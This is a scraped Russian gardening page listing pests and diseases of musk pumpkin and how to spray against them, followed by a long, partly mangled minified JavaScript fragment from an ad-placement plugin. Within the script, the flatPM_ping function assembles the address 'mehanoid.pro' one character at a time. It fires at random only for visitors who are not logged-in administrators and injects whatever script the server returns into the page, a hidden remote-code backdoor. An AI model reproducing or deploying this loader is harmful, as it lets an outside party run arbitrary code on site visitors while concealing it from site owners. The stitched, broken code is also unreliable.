  • Паутинный клещ. Мелкие, длиной до 0,4 мм, насекомые являются настоящим бичом для всех тыквенных растений. Порой поражение посевов приобретает глобальный характер. Определить присутствие клещей можно по наличию небольших паутинок на листьях. Листочки желтеют, приобретают мозаичную окраску. При обнаружении вредителей незамедлительно проводят опрыскивание акарицидами (актеллик, фитоверм и др.). Можно использовать народный метод – опрыскивание настоем чеснока и лука, но в последние годы в связи с мутацией паразитов этот метод малоэффективен.
  • Бахчевая тля. Зачастую появляется на не прополотых от сорняков грядках. Основные признаки – опадение цветков, листья скручиваются и вянут. Тлю можно увидеть невооруженным взглядом. Обычно насекомые собираются в колонии снизу листовых пластинок, завязях и цветках. Победить тлю поможет опрыскивание растения мыльным раствором или использование инсектицидов.
  • Бактериоз. На листочках тыквы появились коричневые пятна, а плоды покрылись мелкими бурыми язвами? Ваша мускусная тыква подверглась распространенному заболеванию – бактериоз. Пораженные растения опрыскивают 1%-ным раствором бордоской смеси. Для профилактики им же можно обработать и здоровые кусты.
  • Белая и корневая гнили. Грибковые заболевания, в основном вызванные повышенной влажностью. При выявлении их необходимо уменьшить поливы и обработать растения 0,5%-ным раствором медного купороса.
  • Мучнистая роса. Определить болезнь можно по наличию на растении белесых пятен (мучнистый налет). Под мерами борьбы подразумевается обработка посадок коллоидной серой (30 гр/ведро воды) и 1%-ным раствором медного купороса.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};